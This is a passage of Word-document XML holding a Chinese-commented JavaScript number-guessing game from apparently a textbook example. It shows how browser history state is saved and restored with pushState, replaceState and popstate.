      <w:r>
        <w:t>生成一个随机的数字并初始化游戏状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>state={</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>n:Math.floor(99*Math.random())+1,//</w:t>
      </w:r>
      <w:r>
        <w:t>整数：</w:t>
      </w:r>
      <w:r>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>100</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>low:0,//</w:t>
      </w:r>
      <w:r>
        <w:t>可猜测数字范围的下限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>high:100,//</w:t>
      </w:r>
      <w:r>
        <w:t>可猜测数字范围的上限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>guessnum:0,//</w:t>
      </w:r>
      <w:r>
        <w:t>猜测的次数</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>guess:undefined//</w:t>
      </w:r>
      <w:r>
        <w:t>最后一次猜测</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>修改文档内容来显示该初始状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>display(state);//</w:t>
      </w:r>
      <w:r>
        <w:t>此函数会作为</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序调用，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>同时当单击显示在游戏最后的</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>再玩一次</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>按钮时候，也会调用它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在第二种调用情况下，</w:t>
      </w:r>
      <w:r>
        <w:t>playagain</w:t>
      </w:r>
      <w:r>
        <w:t>参数值为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>playagain</w:t>
      </w:r>
      <w:r>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:t>true</w:t>
      </w:r>
      <w:r>
        <w:t>，则保存新的游戏状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>但是如果是作为</w:t>
      </w:r>
      <w:r>
        <w:t>onload</w:t>
      </w:r>
      <w:r>
        <w:t>事件处理程序调用的情况下，则不保存状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这是因为，当通过浏览器历史记录从其他文档状态回退到当前的游戏状态时，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>也会触发</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件。如果这种情况下，也保存状态的话，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>会将真</w:t>
      </w:r>
      <w:r>
        <w:t>正的游戏历史状态记录覆盖掉</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>在支持</w:t>
      </w:r>
      <w:r>
        <w:t>pushState()</w:t>
      </w:r>
      <w:r>
        <w:t>方法的浏览器中，</w:t>
      </w:r>
      <w:r>
        <w:t>load</w:t>
      </w:r>
      <w:r>
        <w:t>事件之后总是有一个</w:t>
      </w:r>
      <w:r>
        <w:t>popstate</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>因此，这里的处理方式是，等待</w:t>
      </w:r>
      <w:r>
        <w:t>popstate</w:t>
      </w:r>
      <w:r>
        <w:t>事件而不是直接进行状态保存</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果该事件提供一个状态对象，则直接使用该对象即可</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果该事件没有状态对象，就表示这实际上是一个新的游戏，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>则使用</w:t>
      </w:r>
      <w:r>
        <w:t>replaceState</w:t>
      </w:r>
      <w:r>
        <w:t>来保存最新的游戏状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(playagain===true)save(state);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>如果支持的话，就使用</w:t>
      </w:r>
      <w:r>
        <w:t>pushState()</w:t>
      </w:r>
      <w:r>
        <w:t>方法将游戏状态保存到浏览器</w:t>
      </w:r>
      <w:r>
        <w:t>历史记录中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function save(state){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(!history.pushState)return;//</w:t>
      </w:r>
      <w:r>
        <w:t>如果</w:t>
      </w:r>
      <w:r>
        <w:t>pushState()</w:t>
      </w:r>
      <w:r>
        <w:t>方法没有定义的话，则什么也不做</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里会将一个保存的状态和</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>关联起来</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>该</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>显示猜测的数字，但是不对游戏状态进行编码，</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>因此，这对于书签是没有用的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>不能简单地将游戏状态写到</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>中，因为这会将游戏一些机密数字暴露在地址栏中</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var url="#guess"+state.guessnum;//</w:t>
      </w:r>
      <w:r>
        <w:t>保存状态对象和</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>history.pushState</w:t>
      </w:r>
      <w:r>
        <w:t>(state,//</w:t>
      </w:r>
      <w:r>
        <w:t>要保存的状态对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"",//</w:t>
      </w:r>
      <w:r>
        <w:t>状态标题：当前浏览器会忽略它</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>url);//</w:t>
      </w:r>
      <w:r>
        <w:t>状态</w:t>
      </w:r>
      <w:r>
        <w:t>URL</w:t>
      </w:r>
      <w:r>
        <w:t>：对书签是没有用的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这是</w:t>
      </w:r>
      <w:r>
        <w:t>onpopstate</w:t>
      </w:r>
      <w:r>
        <w:t>的事件处理程序，用于恢复历史状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function popState(event){</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(event.state){//</w:t>
      </w:r>
      <w:r>
        <w:t>如果事件有一个状态对象，则恢复该状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>要注意的是，</w:t>
      </w:r>
      <w:r>
        <w:t>event.state</w:t>
      </w:r>
      <w:r>
        <w:t>是对已保存状态对象的一个深拷贝</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>因此无须改变保存的值就可以修改该对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>state=event.state;//</w:t>
      </w:r>
      <w:r>
        <w:t>恢复历史状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>display(state);//</w:t>
      </w:r>
      <w:r>
        <w:t>显示恢复的状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>当第一次载入页面时，会触发一个没有状态的</w:t>
      </w:r>
      <w:r>
        <w:t>popstate</w:t>
      </w:r>
      <w:r>
        <w:t>事件</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>用真实的状态将</w:t>
      </w:r>
      <w:r>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>状态替换掉：参见</w:t>
      </w:r>
      <w:r>
        <w:t>newgame()</w:t>
      </w:r>
      <w:r>
        <w:t>方法中的注释</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>这里不需要调用</w:t>
      </w:r>
      <w:r>
        <w:t>display()</w:t>
      </w:r>
      <w:r>
        <w:t>方法</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>history.replaceState(state,"","#guess"+state.guessnum);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>};//</w:t>
      </w:r>
      <w:r>
        <w:t>每次用户猜测一个数字的时候，都会调用此事件处理程序</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>此处理程序用于更新游戏的状态、保存游戏状态并显示游戏状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">function </w:t>
      </w:r>
      <w:r>
        <w:t>handleGuess(){//</w:t>
      </w:r>
      <w:r>
        <w:t>从</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>字段中获取用户猜测的数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>var g=parseInt(this.value);//</w:t>
      </w:r>
      <w:r>
        <w:t>如果该值是限定范围中的一个数字</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if((g</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>state.low)</w:t>
      </w:r>
      <w:r>
        <w:t>＆＆</w:t>
      </w:r>
      <w:r>
        <w:t>(g</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>state.high)){//</w:t>
      </w:r>
      <w:r>
        <w:t>对应地更新状态对象</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(g</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>state.n)state.low=g;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(g</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>state.n)state.high=g;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>state.guess=g;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>state.guessnum++;//</w:t>
      </w:r>
      <w:r>
        <w:t>在浏览器历史记录中保存新的状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>save(state);//</w:t>
      </w:r>
      <w:r>
        <w:t>根据用户猜测情况</w:t>
      </w:r>
      <w:r>
        <w:t>来修改文档</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>display(state);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>无效的猜测：不保存状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>alert("Please enter a number greater than"+state.low+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"and less than"+state.high);</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>//</w:t>
      </w:r>
      <w:r>
        <w:t>修改文档来显示游戏当前状态</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>function display(state){//</w:t>
      </w:r>
      <w:r>
        <w:t>显示文档的导航和标题</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.heading.innerHTML=document.title=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>"I'm thinking of a number between"+</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>state.low+"and"+state.high+".";//</w:t>
      </w:r>
      <w:r>
        <w:t>使用一个表格来显示数字的取值范围</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.low.style.width=state.low+"%";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.mid.style.width=(state.high-state.low)+"%";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.high.style.width=(100-state.high)+"%";//</w:t>
      </w:r>
      <w:r>
        <w:t>确保</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>字段是可见的、空的并且是聚焦的</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.input.style.visibility="visible";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.input.value="";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.</w:t>
      </w:r>
      <w:r>
        <w:t>input.focus();//</w:t>
      </w:r>
      <w:r>
        <w:t>根据用户最近的猜测，设置提示</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>if(state.guess===undefined)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.prompt.innerHTML="Type your guess and hit Enter:";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(state.guess</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>state.n)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.prompt.innerHTML=state.guess+"is too low.Guess again:";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else if(state.guess</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>state.n)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.prompt.innerHTML=state.</w:t>
      </w:r>
      <w:r>
        <w:t>guess+"is too high.Guess again:";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>else{//</w:t>
      </w:r>
      <w:r>
        <w:t>当猜对了的时候，就隐藏</w:t>
      </w:r>
      <w:r>
        <w:t>input</w:t>
      </w:r>
      <w:r>
        <w:t>字段并显示</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>再玩一次</w:t>
      </w:r>
      <w:r>
        <w:t>"</w:t>
      </w:r>
      <w:r>
        <w:t>按钮</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.input.style.visibility="hidden";//</w:t>
      </w:r>
      <w:r>
        <w:t>不需要再猜了</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.heading.innerHTML=document.title=state.guess+"is correct!";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>ui.prompt.innerHTML=</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>"You Win!</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>button onclick='newgame(true)'</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>Play Again</w:t>
      </w:r>
      <w:r>
        <w:t>＜</w:t>
      </w:r>
      <w:r>
        <w:t>/butt</w:t>
      </w:r>
      <w:r>
        <w:t>on</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>";</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style</w:t>
      </w:r>
      <w:r>
        <w:t>＞</w:t>
      </w:r>
      <w:r>
        <w:t>/*</w:t>
      </w:r>
      <w:r>
        <w:t>通过</w:t>
      </w:r>
      <w:r>
        <w:t>CSS</w:t>
      </w:r>
      <w:r>
        <w:t>样式美化游戏界面</w:t>
      </w:r>
      <w:r>
        <w:t>*/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#prompt{font-size:16pt;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>table{width:90%;margin:10px;margin-left:5%;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
        <w:t>#low,#high{background-color:lightgray;height:1em;}</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00210880" w:rsidRDefault="00923A94">
      <w:pPr>
        <w:ind w:firstLine="480"/>
      </w:pPr>
      <w:r>
